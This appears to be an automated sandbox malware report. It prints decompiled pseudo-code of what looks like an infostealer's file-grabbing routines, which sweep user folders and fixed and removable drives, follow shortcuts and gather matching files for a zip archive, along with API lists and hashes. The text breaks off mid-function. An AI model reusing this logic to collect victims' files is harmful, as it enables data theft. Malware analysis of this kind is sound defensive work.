                                        									_pop(_t463);
                                        									_pop(_t346);
                                        									return E29DADF46(_t277, _t346, _v20 ^ _t483, _t414, _t442, _t463);
                                        								}
                                        								 *0x29dd8814 = 0x80000;
                                        								goto L69;
                                        							}
                                        							if(_t277 == 1) {
                                        								_t465 = _t441[1];
                                        								 *0x29dd86b0 = E29D8E390(_t465);
                                        								__eflags = _t465;
                                        								if(_t465 != 0) {
                                        									E29D8E4A0(_t465);
                                        								}
                                        								goto L68;
                                        							}
                                        							 *0x29dd86b0 = 0x80000;
                                        						}
                                        						goto L69;
                                        					}
                                        					while(1) {
                                        						_t287 = GetDriveTypeA(_t466);
                                        						if(_v6496 == 0) {
                                        							goto L39;
                                        						}
                                        						_t528 = _t287 - 2;
                                        						if(_t287 != 2) {
                                        							goto L39;
                                        						}
                                        						 *0x29dd85cc( &_v2388,  &_v1020);
                                        						_t304 = E29DA4650( &_v2388, "%DRIVE_REMOVABLE%", _t466);
                                        						_t497 = _t497 + 8;
                                        						_push(_t304);
                                        						_push( &_v2388);
                                        						L42:
                                        						 *0x29dd85cc();
                                        						_t376 = _v6492;
                                        						E29D90820(_v6480, _t376,  &_v2388, _t440, _a24, _t528,  &_v2388, _v6488, _a20, _a8, _v6500);
                                        						_t468 = _v6476;
                                        						_t497 = _t497 + 0x14;
                                        						_t296 = lstrlenA(_t468);
                                        						_v6476 =  &(_t468[_t296 + 1]);
                                        						if(_t468[_t296 + 1] != 0) {
                                        							_t466 = _v6476;
                                        							continue;
                                        						}
                                        						goto L45;
                                        						L39:
                                        						 *0x29dd85cc( &_v2388,  &_v1020);
                                        						_t347 = StrStrA( &_v2388, "%DRIVE_FIXED%");
                                        						_t291 =  &_v2388;
                                        						__eflags = _t347;
                                        						if(__eflags != 0) {
                                        							_t470 = _t347 - _t291;
                                        							 *0x29dd8498(0x29dd8830, _t291, _t470);
                                        							_t349 = _t347 + 0xd;
                                        							__eflags = _t349;
                                        							_t142 = _t470 + 0x29dd8830; // 0x29dd8830
                                        							_t299 = _t142;
                                        							 *_t299 = 0;
                                        							wsprintfA(_t299, "%s%s", _v6476, _t349);
                                        							_t497 = _t497 + 0x10;
                                        							_t291 = 0x29dd8830;
                                        						}
                                        						_push(_t291);
                                        						_push( &_v2388);
                                        						goto L42;
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D908E1
                                        • _memset.LIBCMT ref: 29D908F7
                                        • _memset.LIBCMT ref: 29D9090D
                                        • lstrcatA.KERNEL32(?,\Files\), ref: 29D90921
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9092F
                                        • lstrcatA.KERNEL32(?,.zip), ref: 29D90941
                                        • _memset.LIBCMT ref: 29D90972
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D90986
                                          • Part of subcall function 29DA4650: StrStrA.SHLWAPI(?,?,000F4240,?,?,29D909A9,%APPDATA%,?), ref: 29DA465C
                                        • lstrcpy.KERNEL32(?,00000000), ref: 29D909B4
                                        • _memset.LIBCMT ref: 29D909C7
                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 29D909DB
                                        • StrStrA.SHLWAPI(?,%LOCALAPPDATA%), ref: 29D909FF
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90A26
                                        • wsprintfA.USER32 ref: 29D90A40
                                        • lstrcpy.KERNEL32(?,29DD8830), ref: 29D90A56
                                        • _memset.LIBCMT ref: 29D90A6A
                                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 29D90A81
                                        • StrStrA.SHLWAPI(?,%USERPROFILE%), ref: 29D90AA3
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90AC4
                                        • wsprintfA.USER32 ref: 29D90ADE
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90AF6
                                        • GetUserNameA.ADVAPI32 ref: 29D90B14
                                        • StrStrA.SHLWAPI(?,%DESKTOP%,?,?), ref: 29D90BAD
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000,?,?), ref: 29D90BD4
                                        • wsprintfA.USER32 ref: 29D90BEE
                                        • lstrcpy.KERNEL32(?,29DD8830), ref: 29D90C06
                                        • _memset.LIBCMT ref: 29D90CA8
                                        • SHGetFolderPathA.SHELL32(00000000,00000005,00000000,00000000,?), ref: 29D90CBC
                                        • StrStrA.SHLWAPI(?,%DOCUMENTS%), ref: 29D90CDE
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90CFD
                                        • wsprintfA.USER32 ref: 29D90D17
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90D2D
                                        • _memset.LIBCMT ref: 29D90D41
                                        • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 29D90D58
                                        • StrStrA.SHLWAPI(?,%PROGRAMFILES%), ref: 29D90D7A
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90D99
                                        • wsprintfA.USER32 ref: 29D90DB3
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90DC9
                                        • _memset.LIBCMT ref: 29D90DDD
                                        • SHGetFolderPathA.SHELL32(00000000,0000002A,00000000,00000000,?), ref: 29D90DF4
                                        • StrStrA.SHLWAPI(?,%PROGRAMFILES_86%), ref: 29D90E16
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90E3D
                                        • wsprintfA.USER32 ref: 29D90E57
                                        • lstrcpy.KERNEL32(?,29DD8830), ref: 29D90E6D
                                        • _memset.LIBCMT ref: 29D90E81
                                        • SHGetFolderPathA.SHELL32(00000000,00000008,00000000,00000000,?), ref: 29D90E98
                                        • StrStrA.SHLWAPI(?,%RECENT%), ref: 29D90EBA
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90ED9
                                        • wsprintfA.USER32 ref: 29D90EF3
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90F09
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 29D90F88
                                        • GetDriveTypeA.KERNEL32(00000000), ref: 29D90FB7
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90FD9
                                          • Part of subcall function 29DA4650: lstrcpyn.KERNEL32(29DD8830,?,00000000,00000000,?,29D909A9,%APPDATA%,?), ref: 29DA467A
                                          • Part of subcall function 29DA4650: wsprintfA.USER32 ref: 29DA46A6
                                          • Part of subcall function 29DAC130: UnmapViewOfFile.KERNEL32(?,?,00010000,29D911FB,?,?,00000003), ref: 29DAC155
                                          • Part of subcall function 29DAC130: CloseHandle.KERNEL32(?,?,00010000,29D911FB,?,?,00000003), ref: 29DAC166
                                          • Part of subcall function 29DAC130: CloseHandle.KERNEL32(?,?,00010000,29D911FB,?,?,00000003), ref: 29DAC17C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9100B
                                        • StrStrA.SHLWAPI(?,%DRIVE_FIXED%), ref: 29D9101D
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D9103C
                                        • wsprintfA.USER32 ref: 29D9105C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D91072
                                        • lstrlenA.KERNEL32(?), ref: 29D910B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$_memset$lstrcpynwsprintf$FolderPath$lstrcat$CloseDriveHandle$FileLogicalNameStringsTypeUnmapUserViewlstrlen
                                        • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$%s%s$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip$C:\Users\$\Desktop\$\Files\
                                        • API String ID: 1088293546-3106983180
                                        • Opcode ID: 17935446cb6e854f9e3db0db89c683e5b729d7dff2fa961d38358056db579abb
                                        • Instruction ID: a96cee75714189811d719da863e7131c083ccc09e1a26b187491f67ec189eeca
                                        • Opcode Fuzzy Hash: 17935446cb6e854f9e3db0db89c683e5b729d7dff2fa961d38358056db579abb
                                        • Instruction Fuzzy Hash: EE42E372D40265ABD726AF54DC84FEA77B8EF48B04F0481ADE509A7240DB349B85DFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E29D90130(intOrPtr _a4, char* _a8, int _a12, char* _a16, struct _WIN32_FIND_DATAA* _a20, intOrPtr _a24, CHAR* _a28, int _a32, int _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v1540;
                                        				char _v1804;
                                        				char _v2804;
                                        				char _v7804;
                                        				struct _WIN32_FIND_DATAA _v8124;
                                        				intOrPtr _v8128;
                                        				char* _v8132;
                                        				int _v8136;
                                        				int _v8140;
                                        				char* _v8144;
                                        				void* _v8148;
                                        				int _v8152;
                                        				char _v8156;
                                        				CHAR* _v8160;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t127;
                                        				void* _t132;
                                        				void* _t141;
                                        				int _t155;
                                        				int _t170;
                                        				intOrPtr _t171;
                                        				int _t173;
                                        				int _t178;
                                        				CHAR* _t182;
                                        				int _t187;
                                        				intOrPtr _t188;
                                        				CHAR* _t190;
                                        				int _t191;
                                        				int _t199;
                                        				void* _t212;
                                        				CHAR* _t215;
                                        				intOrPtr* _t223;
                                        				void* _t226;
                                        				char* _t227;
                                        				int _t253;
                                        				int _t255;
                                        				int _t257;
                                        				intOrPtr _t277;
                                        				CHAR* _t281;
                                        				signed int _t282;
                                        				void* _t283;
                                        				void* _t285;
                                        				void* _t287;
                                        				int _t288;
                                        				void* _t308;
                                        
                                        				E29DBCDB0(0x1fdc);
                                        				_t127 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t127 ^ _t282;
                                        				_t227 = _a8;
                                        				_t281 = _a28;
                                        				_t279 = _a12;
                                        				_v8128 = _a4;
                                        				_v8144 = _t227;
                                        				_v8140 = _t279;
                                        				_v8132 = _a16;
                                        				_v8160 = _t281;
                                        				wsprintfA( &_v1804, "%s\\*", _t279);
                                        				_t132 = FindFirstFileA( &_v1804,  &_v8124);
                                        				_t259 =  &_v7804;
                                        				_v8148 = _t132;
                                        				E29DB5640( &_v7804, 0, 0x1388);
                                        				_t285 = _t283 + 0x18;
                                        				_t135 = lstrcatA( &_v7804, _t281);
                                        				_v8136 = 0;
                                        				if(_v8148 == 0xffffffff) {
                                        					L57:
                                        					return E29DADF46(_t135, _t227, _v8 ^ _t282, _t259, _t279, _t281);
                                        				} else {
                                        					goto L3;
                                        					L4:
                                        					_push("..");
                                        					_push( &(_v8124.cFileName));
                                        					if( *0x29dd8550() == 0) {
                                        						goto L55;
                                        					}
                                        					_t141 = E29D8FFD0(_t279, 0x80000000);
                                        					_t285 = _t285 + 4;
                                        					if(_t141 == 0) {
                                        						goto L55;
                                        					}
                                        					 *0x29dd85cc( &_v540, _t279);
                                        					lstrcatA( &_v540, "\\");
                                        					lstrcatA( &_v540,  &(_v8124.cFileName));
                                        					_t279 = _a36;
                                        					if(_t279 != 0) {
                                        						L10:
                                        						E29DB5640( &_v1540, 0, 0x3e8);
                                        						E29DB5640( &_v2804, 0, 0x3e8);
                                        						_t287 = _t285 + 0x18;
                                        						_push(0x29dcd617);
                                        						_push(_t227);
                                        						if( *0x29dd8550() != 0) {
                                        							wsprintfA( &_v2804, "%s\\%s", _t227,  &(_v8124.cFileName));
                                        							_t285 = _t287 + 0x10;
                                        						} else {
                                        							wsprintfA( &_v2804, "%s",  &(_v8124.cFileName));
                                        							_t285 = _t287 + 0xc;
                                        						}
                                        						if(lstrlenA( &_v7804) <= 3) {
                                        							__eflags = _t279;
                                        							if(_t279 == 0) {
                                        								L58:
                                        								_t155 = PathMatchSpecA( &(_v8124.cFileName), _v8132);
                                        								__eflags = _t155;
                                        								if(_t155 == 0) {
                                        									goto L51;
                                        								}
                                        								 *0x29dd85cc( &_v276, _t227);
                                        								lstrcatA( &_v276, "\\");
                                        								_t259 =  &_v276;
                                        								lstrcatA( &_v276,  &(_v8124.cFileName));
                                        								_t281 = E29DB75A0(E29DA4E00( &_v540),  &_v276, 0x3e8, 0);
                                        								__eflags = _a24 - _t281;
                                        								if(_a24 <= _t281) {
                                        									goto L51;
                                        								}
                                        								_t135 =  *0x29dd82e8; // 0xa028
                                        								__eflags = _t135 -  *0x29dd82f4; // 0x0
                                        								if(__eflags <= 0) {
                                        									goto L57;
                                        								}
                                        								_t279 = _v8140;
                                        								_t170 = E29D8FFD0(_v8140, 0xc0000000);
                                        								_t285 = _t285 + 4;
                                        								__eflags = _t170;
                                        								if(_t170 != 0) {
                                        									__eflags = _a32;
                                        									_t171 = _v8128;
                                        									if(_a32 == 0) {
                                        										_push( &_v276);
                                        									} else {
                                        										_push( &_v540);
                                        									}
                                        									E29DAD330(_t171);
                                        									_t285 = _t285 + 4;
                                        									 *0x29dd82f4 =  &(_t281[ *0x29dd82f4]);
                                        								}
                                        								goto L51;
                                        							}
                                        							_t173 = PathMatchSpecA( &(_v8124.cFileName), "*.lnk");
                                        							__eflags = _t173;
                                        							if(_t173 == 0) {
                                        								goto L58;
                                        							}
                                        							 *0x29dd8544(0);
                                        							_t227 =  &_v1540;
                                        							_t279 =  &_v540;
                                        							E29D8FA90(_t227,  &_v540);
                                        							 *0x29dd8528();
                                        							_t178 = PathMatchSpecA(_t227, _v8132);
                                        							__eflags = _t178;
                                        							if(_t178 == 0) {
                                        								L50:
                                        								_t227 = _v8144;
                                        								goto L51;
                                        							}
                                        							 *0x29dd85cc( &_v276, _v8144);
                                        							lstrcatA( &_v276, "\\");
                                        							_t182 = PathFindFileNameA(_t227);
                                        							_t259 =  &_v276;
                                        							lstrcatA( &_v276, _t182);
                                        							_t281 = E29DB75A0(E29DA4E00(_t227),  &_v276, 0x3e8, 0);
                                        							__eflags = _a24 - _t281;
                                        							if(_a24 <= _t281) {
                                        								goto L50;
                                        							}
                                        							_t135 =  *0x29dd82e8; // 0xa028
                                        							__eflags = _t135 -  *0x29dd82f4; // 0x0
                                        							if(__eflags <= 0) {
                                        								goto L57;
                                        							}
                                        							_t279 = _v8140;
                                        							_t187 = E29D8FFD0(_v8140, 0xc0000000);
                                        							_t285 = _t285 + 4;
                                        							__eflags = _t187;
                                        							if(_t187 != 0) {
                                        								__eflags = _a32;
                                        								_t188 = _v8128;
                                        								if(_a32 == 0) {
                                        									_push( &_v276);
                                        								} else {
                                        									_push(_t227);
                                        								}
                                        								E29DAD330(_t188);
                                        								_t285 = _t285 + 4;
                                        								 *0x29dd82f4 =  &(_t281[ *0x29dd82f4]);
                                        								__eflags =  *0x29dd82f4;
                                        							}
                                        							goto L50;
                                        						} else {
                                        							_t271 =  &_v7804;
                                        							_t190 = E29DAEA8E(_t227,  &_v7804, _t279,  &_v7804, ":",  &_v8156);
                                        							_t279 = 0;
                                        							_t285 = _t285 + 0xc;
                                        							_t281 = _t190;
                                        							_v8136 = 0;
                                        							if(_a36 != 0 && PathMatchSpecA( &(_v8124.cFileName), "*.lnk") != 0) {
                                        								_v8152 = 1;
                                        								 *0x29dd8544(0);
                                        								E29D8FA90( &_v1540,  &_v540);
                                        								 *0x29dd8528();
                                        								_t279 = _v8152;
                                        								_t227 = _v8144;
                                        							}
                                        							if(_t281 == 0) {
                                        								L25:
                                        								_push(_v8132);
                                        								if(_t279 == 0) {
                                        									_t191 = PathMatchSpecA( &(_v8124.cFileName));
                                        									__eflags = _t191;
                                        									if(_t191 == 0) {
                                        										goto L51;
                                        									}
                                        									 *0x29dd85cc( &_v276, _t227);
                                        									lstrcatA( &_v276, "\\");
                                        									_t259 =  &(_v8124.cFileName);
                                        									lstrcatA( &_v276,  &(_v8124.cFileName));
                                        									_t281 = E29DB75A0(E29DA4E00( &_v540),  &(_v8124.cFileName), 0x3e8, 0);
                                        									__eflags = _a24 - _t281;
                                        									if(_a24 <= _t281) {
                                        										goto L51;
                                        									}
                                        									_t253 =  *0x29dd82e8; // 0xa028
                                        									__eflags = _t253 -  *0x29dd82f4; // 0x0
                                        									if(__eflags <= 0) {
                                        										goto L57;
                                        									}
                                        									_t279 = _v8140;
                                        									_t199 = E29D8FFD0(_v8140, 0xc0000000);
                                        									_t285 = _t285 + 4;
                                        									__eflags = _t199;
                                        									if(_t199 == 0) {
                                        										goto L51;
                                        									}
                                        									__eflags = _a32;
                                        									if(_a32 == 0) {
                                        										L38:
                                        										_push( &_v276);
                                        										L39:
                                        										E29DAD330(_v8128);
                                        										_t285 = _t285 + 4;
                                        										 *0x29dd82f4 =  &(_t281[ *0x29dd82f4]);
                                        										goto L51;
                                        									}
                                        									_push( &_v540);
                                        									goto L39;
                                        								}
                                        								if(PathMatchSpecA( &_v1540) == 0) {
                                        									goto L51;
                                        								}
                                        								 *0x29dd85cc( &_v276, _t227);
                                        								lstrcatA( &_v276, "\\");
                                        								_t259 =  &_v1540;
                                        								lstrcatA( &_v276, PathFindFileNameA( &_v1540));
                                        								_t281 = E29DB75A0(E29DA4E00( &_v1540),  &_v1540, 0x3e8, 0);
                                        								if(_a24 <= _t281) {
                                        									goto L51;
                                        								}
                                        								_t255 =  *0x29dd82e8; // 0xa028
                                        								_t308 = _t255 -  *0x29dd82f4; // 0x0
                                        								if(_t308 <= 0) {
                                        									goto L57;
                                        								}
                                        								_t279 = _v8140;
                                        								_t212 = E29D8FFD0(_v8140, 0xc0000000);
                                        								_t285 = _t285 + 4;
                                        								if(_t212 == 0) {
                                        									goto L51;
                                        								}
                                        								if(_a32 == 0) {
                                        									goto L38;
                                        								}
                                        								_push( &_v1540);
                                        								goto L39;
                                        							} else {
                                        								do {
                                        									_push(0);
                                        									_push(_t281);
                                        									if(_t279 == 0) {
                                        										_t271 =  &_v2804;
                                        										_push( &_v2804);
                                        									} else {
                                        										_push( &_v1540);
                                        									}
                                        									if( *0x29dd8490() != 0) {
                                        										_v8136 = 1;
                                        									}
                                        									_t215 = E29DAEA8E(_t227, _t271, _t279, 0, ":",  &_v8156);
                                        									_t281 = _t215;
                                        									_t285 = _t285 + 0xc;
                                        								} while (_t281 != 0);
                                        								if(_v8136 != _t215) {
                                        									L51:
                                        									_t259 = _a20;
                                        									if(_a20 == 0) {
                                        										goto L55;
                                        									}
                                        									_t156 = _a48;
                                        									_t239 = _a44;
                                        									if(_a48 > _a44) {
                                        										L56:
                                        										_t135 = FindClose(_v8148);
                                        										goto L57;
                                        									}
                                        									if(_v8136 == 0) {
                                        										E29D90130(_v8128,  &_v2804,  &_v540, _v8132, _t259, _a24, _v8160, _a32, _a36, _a40, _t239, _t156 + 1);
                                        										_t285 = _t285 + 0x30;
                                        									}
                                        									goto L55;
                                        								}
                                        								goto L25;
                                        							}
                                        						}
                                        					}
                                        					_t288 = _t285 - 0x1c;
                                        					_t257 = _t288;
                                        					_t223 =  &_v540;
                                        					 *((intOrPtr*)(_t257 + 0x14)) = 0xf;
                                        					 *(_t257 + 0x10) = _t279;
                                        					_v8152 = _t288;
                                        					 *_t257 = 0;
                                        					_t281 = _t223 + 1;
                                        					do {
                                        						_t277 =  *_t223;
                                        						_t223 = _t223 + 1;
                                        						_t294 = _t277;
                                        					} while (_t277 != 0);
                                        					E29D892C0(_t257,  &_v540, _t223 - _t281);
                                        					_t226 = E29D8FBC0( &_v540, _t294);
                                        					_t285 = _t288 + 0x1c;
                                        					if(_t226 != 0) {
                                        						goto L55;
                                        					}
                                        					goto L10;
                                        					L55:
                                        					_t259 =  &_v8124;
                                        					if(FindNextFileA(_v8148,  &_v8124) != 0) {
                                        						_t279 = _v8140;
                                        						L3:
                                        						_push(".");
                                        						_push( &(_v8124.cFileName));
                                        						if( *0x29dd8550() == 0) {
                                        							goto L55;
                                        						}
                                        						goto L4;
                                        					}
                                        					goto L56;
                                        				}
                                        			}


                                        APIs
                                        • wsprintfA.USER32 ref: 29D90184
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9019B
                                        • _memset.LIBCMT ref: 29D901B5
                                        • lstrcatA.KERNEL32(?,?), ref: 29D901C5
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D901F6
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D90210
                                          • Part of subcall function 29D8FFD0: GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 29D8FFF0
                                          • Part of subcall function 29D8FFD0: GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 29D8FFFE
                                          • Part of subcall function 29D8FFD0: _malloc.LIBCMT ref: 29D90011
                                          • Part of subcall function 29D8FFD0: GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 29D9002F
                                          • Part of subcall function 29D8FFD0: GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?), ref: 29D90049
                                          • Part of subcall function 29D8FFD0: OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?), ref: 29D90050
                                          • Part of subcall function 29D8FFD0: DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?), ref: 29D9006B
                                          • Part of subcall function 29D8FFD0: MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?), ref: 29D900C4
                                          • Part of subcall function 29D8FFD0: AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?), ref: 29D900E7
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9023B
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9024D
                                        • lstrcatA.KERNEL32(?,?), ref: 29D90261
                                        • _memset.LIBCMT ref: 29D902C4
                                        • _memset.LIBCMT ref: 29D902DA
                                        • StrCmpCA.SHLWAPI(?,29DCD617), ref: 29D902E8
                                        • wsprintfA.USER32 ref: 29D90305
                                        • wsprintfA.USER32 ref: 29D90324
                                        • lstrlenA.KERNEL32(?), ref: 29D90334
                                        • _strtok_s.LIBCMT ref: 29D90356
                                        • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 29D90379
                                        • CoInitialize.OLE32 ref: 29D9038E
                                        • _strtok_s.LIBCMT ref: 29D903F4
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D90424
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9043A
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9044C
                                        • PathFindFileNameA.SHLWAPI(?), ref: 29D90459
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D90467
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D90481
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D904DB
                                        • lstrcpy.KERNEL32(?,?), ref: 29D904F1
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D90503
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D90531
                                          • Part of subcall function 29D8FFD0: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D900FC
                                          • Part of subcall function 29D8FFD0: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?), ref: 29D90106
                                          • Part of subcall function 29D8FFD0: _free.LIBCMT ref: 29D9010D
                                        • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 29D905B1
                                        • CoInitialize.OLE32(00000000), ref: 29D905C1
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D905E8
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90604
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D90616
                                        • PathFindFileNameA.SHLWAPI(?), ref: 29D9061F
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9062D
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D90643
                                        • lstrcatA.KERNEL32(?,?), ref: 29D90517
                                          • Part of subcall function 29DA4E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,29D90797), ref: 29DA4E1A
                                          • Part of subcall function 29DA4E00: GetFileSizeEx.KERNEL32(00000000,?,?,?,29D90797), ref: 29DA4E2C
                                          • Part of subcall function 29DA4E00: CloseHandle.KERNEL32(00000000,?,?,29D90797), ref: 29DA4E37
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 29D90710
                                        • FindClose.KERNEL32(000000FF), ref: 29D90725
                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 29D9074A
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90760
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D90772
                                        • lstrcatA.KERNEL32(?,?), ref: 29D90786
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D907A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FilePath$MatchSpec$Findlstrcpy$CloseUnothrow_t@std@@@__ehfuncinfo$??2@$Handle_memsetwsprintf$InitializeNameProcessSecurityToken_strtok_s$AccessCheckCreateCurrentDuplicateErrorFirstGenericLastMaskNextOpenSize_free_malloclstrlen
                                        • String ID: %s\%s$%s\*$*.lnk
                                        • API String ID: 626889214-1856930566
                                        • Opcode ID: ed334eb7e8018c7de6de6f02d5ab858cd7561ff484e59959e13c092176fc26a7
                                        • Instruction ID: 38ea7b639dfc99106fa6dc09d0f5615e0c571dbb38e1c29eb0851b72e7af632d
                                        • Opcode Fuzzy Hash: ed334eb7e8018c7de6de6f02d5ab858cd7561ff484e59959e13c092176fc26a7
                                        • Instruction Fuzzy Hash: B202C476950219ABDB15EF60EC84FEA7378BF54700F4085ACF509A3540EB749A86EFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E29D9E060(CHAR* __ebx, CHAR* __ecx, intOrPtr __edx, CHAR* _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v804;
                                        				char _v1068;
                                        				struct _WIN32_FIND_DATAA _v1388;
                                        				intOrPtr _v1392;
                                        				void* _v1396;
                                        				CHAR* _v1400;
                                        				CHAR* _v1404;
                                        				CHAR* _v1408;
                                        				intOrPtr _v1416;
                                        				char _v1420;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t68;
                                        				int _t73;
                                        				void* _t99;
                                        				CHAR* _t101;
                                        				CHAR* _t107;
                                        				signed int _t112;
                                        				void* _t120;
                                        				intOrPtr _t122;
                                        				void* _t123;
                                        				intOrPtr* _t127;
                                        				void* _t132;
                                        				CHAR* _t137;
                                        				CHAR* _t146;
                                        				intOrPtr _t155;
                                        				intOrPtr _t156;
                                        				intOrPtr _t173;
                                        				CHAR* _t178;
                                        				intOrPtr _t179;
                                        				void* _t180;
                                        				CHAR* _t182;
                                        				CHAR* _t183;
                                        				void* _t184;
                                        				signed int _t185;
                                        				void* _t186;
                                        				void* _t187;
                                        				void* _t189;
                                        				void* _t192;
                                        
                                        				_t137 = __ebx;
                                        				_t68 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t68 ^ _t185;
                                        				_t182 = _a4;
                                        				_t179 = __edx;
                                        				_t160 =  &_v1068;
                                        				_v1392 = __edx;
                                        				_v1400 = _t182;
                                        				_v1404 = _a8;
                                        				_v1408 = __ecx;
                                        				wsprintfA( &_v1068, "%s\\*", _t182);
                                        				_t187 = _t186 + 0xc;
                                        				_t73 = FindFirstFileA( &_v1068,  &_v1388);
                                        				_v1396 = _t73;
                                        				if(_t73 == 0xffffffff) {
                                        					L33:
                                        					return E29DADF46(_t73, _t137, _v8 ^ _t185, _t160, _t179, _t182);
                                        				} else {
                                        					do {
                                        						 *((intOrPtr*)(_t179 + 0x1c)) =  *((intOrPtr*)(_t179 + 0x1c)) + 1;
                                        						_push(".");
                                        						_push( &(_v1388.cFileName));
                                        						if( *0x29dd8550() == 0) {
                                        							goto L31;
                                        						}
                                        						_push("..");
                                        						_push( &(_v1388.cFileName));
                                        						if( *0x29dd8550() == 0) {
                                        							goto L31;
                                        						}
                                        						E29DB5640( &_v804, 0, 0x104);
                                        						E29DB5640( &_v276, 0, 0x104);
                                        						_t189 = _t187 + 0x18;
                                        						lstrcatA( &_v804, _t182);
                                        						lstrcatA( &_v804, "\\");
                                        						lstrcatA( &_v804,  &(_v1388.cFileName));
                                        						lstrcatA( &_v276, "\\");
                                        						if(_a12 == 0) {
                                        							_t146 =  *0x29dd824c; // 0x15a1c60
                                        							lstrcatA( &_v276, _t146);
                                        						} else {
                                        							_t178 =  *0x29dd7b54; // 0x15a1b40
                                        							lstrcatA( &_v276, _t178);
                                        						}
                                        						lstrcatA( &_v276, "\\");
                                        						lstrcatA( &_v276, _t137);
                                        						lstrcatA( &_v276, "\\");
                                        						lstrcatA( &_v276, _v1404);
                                        						lstrcatA( &_v276, "\\");
                                        						lstrcatA( &_v276, _v1408);
                                        						_t99 = _a16 - 1;
                                        						if(_t99 == 0) {
                                        							lstrcatA( &_v276, "\\");
                                        							_t101 =  *0x29dd8088; // 0x1597178
